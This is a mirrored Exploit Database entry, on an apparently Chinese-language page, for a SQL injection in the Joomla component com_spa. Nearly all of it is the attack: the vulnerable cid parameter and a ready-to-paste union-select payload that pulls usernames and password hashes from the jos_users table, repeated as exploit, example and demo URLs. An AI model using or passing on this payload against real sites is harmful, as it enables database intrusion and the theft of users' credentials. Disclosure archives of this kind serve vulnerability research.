Joomla! Component com_spa – SQL Injection (2)

• Exploit Database
• 116 阅读

• 作者： Palyo34 & KroNicKq
  日期： 2010-07-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14394/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38

  =================================================== Joomla Component (com_spa) SQL Injection Vulnerability ===================================================   Author : Palyo34 & KroNicKq   Homepage : http://www.1923turk.com   ===================================================     [+] Vulnerable File :     http://www.site.com/index.php?option=com_spa&view=spa_product&cid=[SQL]     [+] ExploiT :   -1+union+select concat(username,0x3a,password)+from+jos_users     [+] Example :   http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-1+union+select concat(username,0x3a,password)+from+jos_users     [+] Demo :   http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-20+union+select+concat(username,0x3a,password)+from+jos_users     =================================================== I Lowe You Joomla :)) ===================================================   Greetz : 1923Turk All Users